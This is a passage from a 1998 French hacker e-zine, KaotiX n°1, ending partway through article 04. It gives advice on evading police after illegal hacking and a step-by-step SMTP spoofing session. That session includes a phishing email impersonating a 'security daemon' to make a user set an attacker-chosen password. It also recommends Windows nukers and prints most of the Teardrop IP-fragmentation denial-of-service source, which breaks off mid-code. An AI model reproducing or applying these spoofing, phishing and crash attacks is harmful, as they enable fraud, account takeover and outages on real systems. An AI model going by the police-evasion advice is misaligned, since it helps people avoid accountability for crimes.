kaotix-01.txt

# tHe nEtWoKed BrAiN hAcKeRs cOrp. 
# klh@mygale.org

presents...             








                                    /\
                                   / /
        __           <|==|>      >> <<                  
        \ \    /\      ||        / /      _/\_        /|
         \ \  /  \_____||       . .     _/    \_     / |
          \ \/           \__@__/   \___/        \___/ /__________
          /    __ ____  __    ____ _________ ___  ___  _________/
         !    |  |   / /  \  / __ \__   ___/|\  \/  /  |
 _______/     |     / / O  \| (__) | | | |  | \    /    \
/________     |     \/      \      | | | |  | /    \     \___
         \    |__|___\__|____\____/  |_| |__|/__/\__\     __////
         /                                               /
        / /\___      __________    _____                /
       /_/     |     \         \  /     \_      ______/
               |     /          \/        \_   _/   
               |    |                       \_/
               !!!!!!                        |
                !!!!                       <-.->
             ____!!__________________________|___________
            /                                            \
           /         ** Le EziNe cYbErPuNk! **            \
          /                                                \
          \            KOs aNd cYbErCuLtUre!               /
           \______________________________________________/

                  [ KaotiX N°I - edit 2 - juin98 ]






                                                     -=[iXtlan]=-
                                                       (k)1998


<<[ EDITO ]>>
-------------

KaotiX est un E-zine (Electronic Fanzine) sur le hack, la cyberculture et les cyberpunks, la techno (teknival et free parties only), internet et le monde des rezos...l'underground subversif !

Depuis l'arrive en masse du grand public sur le monde des rezos planetaires (internet)les choses ont bien changées! Les keufs sont de plus en plus présents, verifiant les connexions, harcelant les ISP (internet service provider) pour qu'ils donnent le nom de tel ou tel individu considéré comme un hacker (pirate)et dont la police aimerait bien voir les activites cessées. Le pire c'est que la loi francaise oblige les ISP et societes d'hebergement de sites webs a connaitre les noms et adresse des personnes qu'elles hebergent et a les donner
aux autorités sur simple demande de celles ci!
Donc soyez vigilant! si vous lisez ce texte c'est que a priori la scene du hackin et la contre culture vous interessent, raison de plus pour surveiller vos arrieres!

voici quelques articles qui j'espere vous interesseront et ferrons peut etre changer votre facon de voir les choses, le monde, internet, les autres...
Et n'oublies pas que si le hackin est interdit c'est parcequ'il procure une sensation de liberté que les hautes spheres teknokrates de notre societe ne peuvent pas supporter (surment a cause de balai qui leur est reste coince dans le cul).Le hacker est comme un junkie, sauf que lui sa dope c'est la connexion, le web,le telnet, les systems d'exploitation et leur divers faillent qui lui permettent de zoner sur les serveurs du monde entier... 

***kEeP oN hAcKiN aNd gEt sToNeD oF cOuRsE ;-)

#-:[ NOTA ]:-#
Si vous voulez recevoir les prochain numeros de KaotiX inscrivez vous sur la mailing list enenvoyant un mail a klh@mygale.org en parlant un peu de vous de ce que vous faites (ou voulez faire), histoire de verifier que vous n'etes pas de la poulice....

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



                  ---------------------------------- 
                  |   *** TABLE DES MATIERES ***   |
                  ----------------------------------




[ N° ]--------[ TITRE ]----------------------------------
  00       #   disclaimer!
  01       #   cyber parano ou comment rester libre
  02       #   comment hacker le SMTP d'un Unix
  03       #   Spiral 23 Tribe en France (faites la teuf!)
  04       #   les Nukers comment ca marche ?
  05       #   virus (code sources et compilation)
  06       #   IRC takeover et autres astuces
  07       #   hacker un user sur unix 
  08       #   les dernieres conneries de microsoft
  09       #   comment cracker un password
  10       #   .htaccess (et ses failles)
  11       #   tools for a GNU generation
  12       #   da cyberpunk revolution
  13       #   comment planquer ses données
  14       #   the ANIRAE project for a free cyberspace...
  
  15       #   LinkZ on Da wEb ;P)  
  16       #   remerciements...





Bon voila pour KaotiX n°1, la suite dans le n°2 a paraitre je sais pas trop quand... ;-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#00#

                      ¤¤¤[ DISCLAIMER ]¤¤¤
               (lisez ca avant de lire la suite!)


Cette cyber publication est la a titre d'information, si vous utilisez son contenu  dans un but mal intentionne, c'est pas ma faute! c'est vous qui agissez et si vous voulez me poursuivre pour incitation a des actes illegaux alors aller vous faire... ok?!:)

Le hacker n'a pas pour but de foutre en l'air un system mais simplement de le parcourir, donc evitez tout acte nefaste pour le system (c'est pas tres cool pour ceux qui doivent le gerer...)

Toutes les informations et sources contenues dans ce numero sont la a titre informatif, KaotiX ne garanti donc en aucun cas l'utilisation qui peut etre fait des divers exemples sites! De plus ce document s'adresse a des personnes censées et dont l'intellect s'eleve un peu plus haut que celui des keufs et autres enculés affiliés a l'administration francaise (ou etrangere). Si vous etes un keufs, ne lisez pas ce document (en tout cas je vous aurez prevenu) et le fait que vous le lisiez constiturai donc un violation des lois sur le copyright et la proprieté intellectuelle.....

!!! FRENCH POLICE SUCKS !!!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#01#



          ___________________________
         /                           \------------//----//-----\\-0
        <      * CYBER PARANO *       >----------//----//------//-0
         \___                     ___/----------//-----\\------\\-0
             \ ou comment rester /-------------//-------\\-----//-0 
              \___   libre   ___/-------------//---------\\----\\-0
                  \_________/----------------//-[ixtlan98]\\---//-0





S'il y a bien quelque chose qu'il faut eviter quand on a des pratiques illegales c'est de se faire prendre! voici donc quelques petits conseils pour vous eviter un jour de vous retrouver face a des individus bizzaroides aux noms evocateurs de commissaires, inspecteurs, brigadiers, sergents (aussi couramment appellés keufs, condes, flicailles, poulets, batards, et d'autres diminutifs tout aussi charmants que rassurants :)

Tout d'abord il faut TOUJOURS appliquer les quelques règles de bases suivantes, ce qui deja vous evitera d'etre chopper par des admins trop curieux!

 1. Ne jamais devoiller son nom (utilisez un pseudo)
 2. Ne jamais donner (meme a des personnes en qui ont a confiance)             son numero de telephone ou son adresse...
 3. N'utilisez pas l'email de votre provider pour faire transiter des         infos a tenances illegales! 
 4. Ne frimez pas du genre "oui j'ai reussi a hacker tel ou tel         server!"
 5. encryptez toutes données piratées sur un serveur et planquez les             dans des repertoire cachés (cf. article n°13)
 6. en FTP tjrs utiliser un login anonyme
 7. n'acceptez pas les cookies (JavaScripts ou CGI)
 8. ne mettez pas votre email dans le mailer de votre browser !!!
 9. deconnectez vous a la moindre alerte
10. n'avouez jamais avoir commis tel ou tel delit et ne signez jamais             une deposition avant de l'avoir lue et relue et relue (ce qui         fera bien chier les keufs!! hehe :)

voila les dix commandements qu'un hacker doit savoir suivre s'il veut rester libre! Ca a l'air con comme ca mais les hackers qui sont en taule ont tjrs ete pris parcqu'ils ont failli a une de ces regles! alors ne deconnez pas et pensez tjrs qu'il vaut mieux abandonner plutot que d'etre en taule (enfin c'est mon avis en tous cas !)

Bon maintenant que vous connaissez les regles voici comment faire pour les appliquer:

Il faut tjrs utilisez un pseudo, de preference un qui vous designe et qui fera que vos potes puissent vous reconnaitre (evitez donc les pseudos du style 'bob', 'bill' ou 'toto')... Ne signez jamais vos mails avec votre vrai nom et si vous aller sur IRC verifier bien votre RealName!
Les clients IRCII et BitchX vont par defaut vous appliquer comme RealName les donnees saisies par l'admin lorsqu'il vous a ouvert un compte... Ainsi il n'est pas rare de voir debarquez quelqu'un sur IRC et lorsqu'on fait un /whois sur son nick le client nous donne son vrai nom! pour cela il faut exporter la variable
REALNAME et lui donné une autre valeur. Voici comment faire pour IRCII et BitchX (qui sont les clients unix les plus repandus!)
loggez vous en telnet et taper au prompt

% set REALNAME="nouvelle_valleur"
% export REALNAME

(le nom de la variable doit toujours etre en majuscule)
il est possible que selon le shell que vous utilisez (bach, zsh, ksh, csh) la commande 'export' pose des problems. Dans ce cas editez votre fichier '.bashrc'(dans le cas de l'utilisation du shell bourne) dans un editeur type emacs ou vi et ajoutez la ligne suivante:

export REALNAME="nouvelle_valeur"

Note: le fichier .bashrc (ou .cshrc, .kshrc, .zshrc,...) est un fichier cache car il commence par '.' pour le lister tapez
% 'cd ~'    (retour dans le homedir)
% 'ls -al'  (liste tous les fichiers)

Bon voila comment faire pour eviter d'etre repere sur IRC... il est aussi preferable d'utiliser une IP dynamic ce qui compliquera la tache de quiconque qui essayerait de vous localiser!

En ce qui concerne l'Email, il est vivement deconseiller (tres vivement meme) de faire transiter des infos a caractère illégal via l'email que vous a attribué votre provider (car celui ci est tenu par la loi de communiquer tous les renseignements vous concernant aux autorités si elles le demande!)Pour pallier a ce problem vous pouver ouvrir un compte email sur un serveur gratuit (il y a en a de plus en plus sur le web) comme par exemple
     
--[URL]-------------[email]--[espace]--[smtp]---[qualite]
www.mygale.org        oui      10Mo     non       *****
www.geocities.com     oui       1Mo     oui       ***
www.chez.com          oui       5Mo     oui       **
www.altern.org        oui       5Mo      ?        ****

                
en plus d'un compte sur le www et d'un ftp ils vous fourniront une adresse email accessible en POP3. Il est aussi recommandé d'encoder toutes les données qui transiteront via le reseau (mot de passe, compte FTP, adresse www, et autres) en utilisant un encoder du type UUENCODE ou PGP (les sources de ces encoders sont sur le web) le mieux etant encore de creer son propre encoder en utilisant un protocole de codage connu uniquement de vous et celui a qui vous faites passer l'info ; par exemple remplacer chaque lettre par la son numero (A=0 B=1 C=2..) multiplie par la date d'envoie du courrier.... (1juin98 = 010698)Ainsi vous pouvez etre sure que personne ne decodera votre message :-)

Il est tres facilement possible de creer un encodeur/decodeur en faisant un fichier batch ou shell (suivant l' OS utilise:-)

bon voici un ptit protocole d'encodage qui pourrait vous etre utile:

         A= 01    K= 11    U= 21    4= &4
         B= 02    L= 12    V= 22    5= &5 
         C= 03    M= 13    W= 23    6= &6
         D= 04    N= 14    X= 24    7= &7
         E= 05    O= 15    Y= 25    8= &8
         F= 06    P= 16    Z= 26    9= &9
         G= 07    Q= 17             0= &0
         H= 08    R= 18    1= &1
         I= 09    S= 19    2= &2
         J= 10    T= 20    3= &3


jusque la c'est plutot simple mais tout ce complique qd on mutliplie
chaque lettre par la date 
ainsi en considerant que nous sommes le 01 juin 98:

A= 01 x 010698 = 010698   (A tjrs egal a la date)
B= 02 x 010698 = 021396
C= 03 x 010698 = 032094
etc...

les chiffres seront codés de la meme facon precedes de '&' soit
1 = &1 x 010698 = &010698 
2 = &2 x 010698 = &021396
3 = &3 x 010698 = &032094

pour une bonne comprehension on separe chaque lettre par un '/' et chaque mot par par un retour a la ligne...chaque lettre est codee sur 6 caracteres (les chiffres etant precedes d '&')

bon aller petit exercice de comprehension! decodez moi cette phrase en sachant que la date est le 1er juin 98 ;-)

064188/192564/053490/149772/032094/085584/
171168/160470/128376/096282/032094/053490/
203262/224658/032094/117678/203262/

Si vous avez trouve envoyez un mail a klh@mygale.org avec la reponse et qui sait vous gagnerez peut etre un voyage sur la Lune ?!;)

voila pour l'encryptage :)

Mais il y a d'autre moyens de se faire reperer le plus courant etant d'oublier certains fondements de base du manuel de survie du parfait petit hacker!
Ne concentrez jamais les infos vous concernants au meme endroit!!!
C'est pourquoi il est vivement déconseiller de mettre son adresse email dans le mailer du browser. De meme il est tres mauvais d'accepter les cookies (qu'ils soient JavaScript ou CGI).
En effet un serveur FTP bien ficele qui recoit la visite d'un client FTP anonyme (ex:Netscape) connaitra l'IP de celui ci et pourra lancer une recherche d'ident sur la couche TCP/IP du provider utilisé... 
Si le visiteur utilise un client IRC en meme tmp, le serveur FTP connaitra desormais son IP et son user ce qui est suffisant pour reconstituer l'email en question...(c'est comme ca que les listes
de spams se crées a cause de visiteurs qui ne font pas attention!)

Voila c'etait la partie pour les parano du rezo :) mais c'est en etant trop parano qu'on evite de finir dans une cage ou face a la brigade de repression des fraudes et d'application de la loi "informatique et liberte"... alors n'oubliez pas de faire attention a ce que vous faites et deconnectez vous a la moindre alerte!



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#02#   




      =============\                             /===============
            _______\\___________________________//__________
           /                                                \
          []     -[ COMMENT  HACKER LE SMTP D'UN UNIX ]-    []
           \________________________________________________/





# NOTE:
# Cet article est tiré d'un article de Noway (Ezine underground de  # hack paru sur le rezo francais en 1994) ecrit par NeurAlien ;-)

Bon le principe est simple et requiert un minimum de connaissance dans le monde des systems Unix (si vous n'utilisez que fenetre95 alors sautez cette section ou meme aller vous couchez en oubliant ce que vous venez de lire! haha;-)

Bon sous unix le transfert de mail (SMTP= Simple Message Transfert Protocol) se fait via le module SendMail qui ecoute les messages des autres mailers et de ses clients via la port TCP numero 25

pour verifier ca, si vous me croyez pas, loggez vous sous le shell:

% grep smtp /etc/service

voila ce ki devrait apparaite alors :
smtp            25/tcp          mail

voila donc comment proceder pour envoyez un faux email via le SMTP de votre system... faites un telnet sur votre serveur en utilisant le port 25, soit:

% telnet localhost 25

[ dans ce qui suit ce qui est tape au clavier commence par >>> ]
[ DaubeNet etant le nom fictif d'un serveur pas si fictif que  ]
[ ca mais dont le DNS restera anonyme ! ;-) hehe....           ]

----------------
DaubeNet {102} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to machine.server.fr
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 01 June 98 03:51:55 -0600
220 ESMTP spoken here
>>>help
214-Commands:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail@CS.Berkeley.EDU.
214-For local information send email to Postmaster at your site.
214 End of HELP info
>>>help helo
214-HELO <hostname>
214-    Introduce yourself.
214 End of HELP info
>>>help mail
214-MAIL FROM: <sender>
214-    Specifies the sender.
214 End of HELP info
>>>help rcpt
214-RCPT TO: <recipient>
214-    Specifies the recipient.  Can be used any number of times.
214 End of HELP info
>>>help data
214-DATA
214-    Following text is collected as the message.
214-    End with a single dot.
214 End of HELP info
>>>help quit
214-QUIT
214-    Exit sendmail (SMTP).
214 End of HELP info
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

Bon voila donc comment ca marche:
"Helo"         vous presente 
"mail from"    designe l'adresse fictif que vous voulez employer
"rcpt to"      designe la personne a qui envoyer le mail

----------------------
DaubeNet {103} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to machine.server.fr
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
220 ESMTP spoken here
>>>helo ducon.fbi.com
250 DaubeNet Hello machine.server.fr[127.0.0.1], pleased to meet you
>>>mail from: root@ducon.fbi.com
250 root@ducon.fbi.com... Sender ok
>>>rcpt to: fred@machine.server.fr
250 fred@machine.server.fr... Recipient ok
>>>data
354 Enter mail, end with "." on a line by itself
>>>
>>>Please, would you stop playing with my Unix system otherwise i'll
>>>send a wet operation commando to your university.
>>>
>>>Nigel X.
>>>System Administrator at FBI Inc.
>>>root@fbi.com
>>>.
250 DAA00299 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

hahaha le fred@machine.server.fr va avoir la trouille de sa vie :) hehe... voila ce qu'il va voir en se loggant sur son shell :

----------------------
DaubeNet {104} >>> mail
Mail version 5.5 6/1/90.  Type ? for help.
"/var/spool/mail/fred": 1 message 1 new
>N  1 root@ducon.fbi.com    Thu Sep 15 03:55  14/508  
& >>>1
Message 1:
From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
From: root@ducon.fbi.com
Apparently-To: fred                     

Please, would you stop playing with my Unix system otherwise i'll
send a wet operation commando to your university.

Nigel X.
System Administrator at FBI Inc.
root@fbi.com

---------
hmmm toutefois l'astuce n'est pas parfaite car le "Apparently-To" ne fait pas tres credible! d'ou la petite bidouille a faire qui rendra votre mail parfaitement coherent :) 
Il suffit de mettre dans le corp du mail (apres la commande 'data')
en premiere ligne du message 
"To: fred@machine.server.fr"

voici en detail l'operation parfaite:
----------------------
DaubeNet {105} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to machine.server.fr
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
220 ESMTP spoken here
>>>helo
250 DaubeNet Hello machine.server.fr [127.0.0.1], pleased to meet you
>>>mail from: root@fbi.com
250 root@fbi.com... Sender ok
>>>rcpt to: fred@machine.server.fr
250 fred@machine.server.fr... Recipient ok
>>>data
354 Enter mail, end with "." on a line by itself
>>>To: fred@machine.server.fr
>>>
>>>Good afternoon,
>>>
>>>    Could you please stop playing with my unix system otherwise        >>>    i'll be forced to send one of our wet operations' commando to >>>    execute you.
>>>
>>> Nigel X, System Administrator at Fbi Inc.
>>>.
250 DAA00307 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

et voila le fred@machine.server.fr va recevoir un mail completement transparant et il croira vraiment recevoir un mail depuis root@ducon.fbi.com !!! 
En plus une telle manip vous rend indetecable puisque le "helo" lancé au server n'est suivi d'aucun argument, ce qui va faire donc que ce con de server se reconnaitra lui meme :) ehehe

voila de koi plaisanter pendant de bonnes heures avec ca :)

hacker le SMTP d'un serveur est interessant car il va vous permettre pas mal de petites libertes du genre mailer votre admin en l'engueulant quant a son incapacite technique a gerer le server ! (sans grand interet toutefois)mais aussi pourquoi pas a vous faire passer pour le deamon du systeme et a jouer de tous vos talents cachés pour recupérer des mots de passes sur les comptes
des autres utilisateurs :) hehe

voici un exemple qui a fait ses preuves plus d'une fois...
-------------------
faites un mail a un utilisateur choisi pour son incompetence technique sur unix en mettant en 
"mail from: security-daemon@machine.server.fr"
ensuite regardez bien le log de l'unix sur lequel tourne votre serveur (ici on prend comme exemple le Digital Unix OSF1...
--------
from: security-daemon@machine.server.fr
To: fred@machine.server.fr
Subject: security automated mailing

*** This is a automated generated mailing: do not reply! ***

The security daemon of Digital Unix OSF1 (machine.server.fr)
has found that your password is unsecure. You should change it
to "uX23-dmp0" otherwise your account will be disabled.
To change you password type "passwd" in your shell and follow
the instuctions.

Thank you
Security Daemon
--------

hehe ainsi l'utilisateur preplexe obeira sans comprendre aux ordres de la soit disante machine et changera son mot de passe en ce que vous lui avait dit :)
et voila comment gagner un peu d'espace sur les disks des autres (lol:) Il paraitrait meme que NeurAlien aurait reussi a faire changer son pass a un admin qui a cretinement obeit aux ordres de packages securitaires qu'il n'a meme pas installes! 
(vraiment con l'admin non? ?:)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#03#
          
                        SPIRAL 23 TRIBE EN FRANCE
                            (faites la teuf!)
 
                                   : 
                                  /9\  
                       :          n$X           :
                       ?L         $$B          :X       
                        $B<:     U$$$X        :X!
                        7$$N$   <R$$$@      :W$E
                         T$$$i:  @$$$&    :u$$$$
                          M$$$$: @$$$R  :t$$$$*
                 ^%$_      7"$$$:7$$$R:!@$$$*!    _$%^  
                   ~$$$N$*%_\9$$$/R$$!$$$*:/_%$$$$*~ 
                      *$$$$$*WX!$N~$FtW#Xd$$$$$*
                       _   ^^^%$$$%%%%$$$%^^^   _
                        ^^%%##%%#$$$%%%$%%$$$%^^   
                             ~~~~^:$$:^~~~~  
                                   X# 
                                   ||  
                   !!! LEGALIZE FREE TEKNO MUZIK !!! 


par iXtlan (klh@mygale.org)
============================

Je sais pas si vous etes comme moi, mais j'ai tendance a tjrs me retrouver dans des plans illegaux? je sais pas si c'est par gout du risk mais dans tout ce que je fais je trouve un moyen d'aller contre la loi! Il faut dire aussi que les instances politiques et policieres francaises ont tendance a rendre illegal tous ce qui est fun: hack, phreak, drogues, teufs, teknival, etc...
Mais que faire? sois on rentre se coucher degoute de rater une occasion comme ca de faire la teuf... tout ca a cause de lois abjectes, soit on s'en fout et on va contre ces lois! moi j'ai deja choisi (hehe) et rien ne m'empechera d'aller en teuf, ou de hacker un system, ou de fumer de la 'rezine de kanabis' (comme dit le meilleur ami de l'homme: le keuf...)

Enfin voila koi:) Le retour des beaux jours annonce le retour des teknivals sur  le sol francais... "les teknikoi ???" diront certains et a eux je repliquerai "les TEKNIVALs bordel! tu sais les grosses teufs hardcore illegales mais tellement terribles, peuplés de tribues de travelers nomades qui zonent sur les sols européens a le recherche des meilleurs coins pour faire la teuf!"

he oui l'inconvenient (mais aussi le charme) de ces teufs c'est qu'elles sont illegales et donc que les trouver est tjrs une aventure palpitante! D'abord faut trouver l'infoline ce qui est faisable en degotant le fly ('flyer' pas les fly qu'on degote au cours de la teuf! lol) ou en interogeant les relations que l'on a dans le milieu des teufers... ensuite faut reussir a appeller cette ptin d'infoline (ce qui nous donne encore une raison de maudir france telecom)
quand on voit la mauvaise qualite des services locaux de telephonie!
L'infoline nous revelent en general un lieu de rendez vous du genre
"Rendez vous sous le pont machin, entre 22h et 3h du mat"... 
ahh cool mais c est ou la pont machin ?? (vu qu'on vient de se taper 300 bornes pour caller a cette teuf et qu'on debarque dans la ville on connait pas forcement tous les noms des ponts ! donc direction l'arret de bus le plus proche ou l'on trouve en general un plan de la ville .... au pire on peut tjrs demander aux indigenes locaux (style octogeneres bien peignes et effrayes par le look decadent des teufers qui viennent lui demander pour la quinzieme fois ou l'on peut touver
le pont machin!)
enfin apres moultes efforts et tracassements et a l'heure prevue on arrive a ce fameux pont pour la s'appercevoir que certes teufers il y a, mais aussi bcp de keufs squattent au bout de la rue regardant avec attention tout ce ptit monde s'agiter! Quoi qu'il en soit on va pas se gacher la teuf pour autant et un keum nous refile le plan pour aller jusqu'au lieu dit ou se deroule la teuf, yeah cool!

Et voila direction la Zone industrielle la plus proche pour y retourver les sounds systems et les teufers! Mais ont est tjrs loin de s'imaginer que a chaque fois il faut traverser des chemin cailleux (a peine si un 4x4 ose passer) rouler quelques dizaines de minutes dans la boue, en se disant "ptin c'est ou la teuf ?? on est dans un autre departement la".... puis finalement il est 2h du mat, on commence a se decourager quand on apercoit enfin les stroboscope au loin "hourraa!!!!" et oui c est tjrs le meme reconfort quand on trouve la teuf, les lights, et surtout le beat! Poum! Poum! Poum! un DJ mix un hardcore tonitruant (proche des 220bpm)l'endoit est magnifique, le ciel degagés et les etoiles scintillantes! en gros
ca vallait bien le detour koi :)
Et voila on est en teuf, a block sur le sound system, le corps se dechaine, et l'esprit se lache (il est vrai que les divers substances absorbées l'aide a partir dans tous les sens:)Et la deux options sont possibles: soit la teuf se deroule sans accros, nickel koi, noprob... soit les keufs arrivent et font cesser la zik ce qui est tjrs 
hautement dezagreable!

voila c'etait la chronique de teufs, surtout que cet ete y'a les Spiral en France et pas mal de bonnes dates:) (notament un tekni en republic tchek hehe)

en conclusion:   !!! FRENCH POLICE SUCKS !!!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#04#

                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                  @@@@@                       @@@@@
                  @@@@@      LES NUKERS       @@@@@
                  @@@@@                       @@@@@
                  @@@@@  comment ca marche?   @@@@@
                  @@@@@                       @@@@@
                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

(k)1998
[iXtlan]


Les Nukes sont des attaques lancés depuis un poste connectés sur internet vers un autres poste lui aussi connecte.
Ces attaques utilisent une faille dans le noyau de l'OS visé, ainsi les machines sous Win95/Nt sont extremement faciles a Nuker! Le Nuke envoie des 'packets' d'informations vers une IP (identifiant la machine visee) qui vont faire planter le CPU (incapable de gerer toutes ces infos en meme tmp).
Il existe plusieurs Nukers pour Windows le meilleur etant sans conteste la version 2 de WinNuke32 ecrit par Nuke2Kill: 

http://www.geocities.com/SiliconValley/Way/8056/

Cette version deux est en effet capable de planter n'importe quelle station sous windoze meme si celle ci est patchee! (le patche de microsoft etant un daube qui essaye veinement de pallier aux defaillance du system lui meme daube de chez daube!!!)

Si vous ne voulez pas etre nuker pas la peine d'installer 36 patches le seul moyen est d'installer LINUX!!!! (www.linux.org)
De plus l'installation de Linux (je vous conseil la distribution Debian ou RedHat) vous permettra de compiler les sources des meilleurs Nukers actuels que sont Teardrop, Newtear, Nestea, Octopus, NTsunKill, Bonk, Boink, etc...
(http://www.rootshell.com)

Ces nukers necessitent d'etre root pour etre installes donc le mieux est encore de recuperer un vieux 486 et d'installer Linux dessus! d'ailleurs vous pourrez vous servir de cette machine entant que Firewall pour votre rezo ce qui protegera  vos stations win;-) 
(en plus de ca vous pourrez vous debarrassez de votre WinGate qui est un prog certes bien utile mais n'assurant pas une securite adéquate: il existe plein de petits progs qui vont planter les wingates et ainsi deconnecter l'utilisateur!)

voici le source de Teardrop par route|daemon9  <route@infonexus.com> sans doute le meilleur nuke actuel!


/* 

Debut du source de Teardrop 

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x1c    /* datagram frame padding for first packet */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
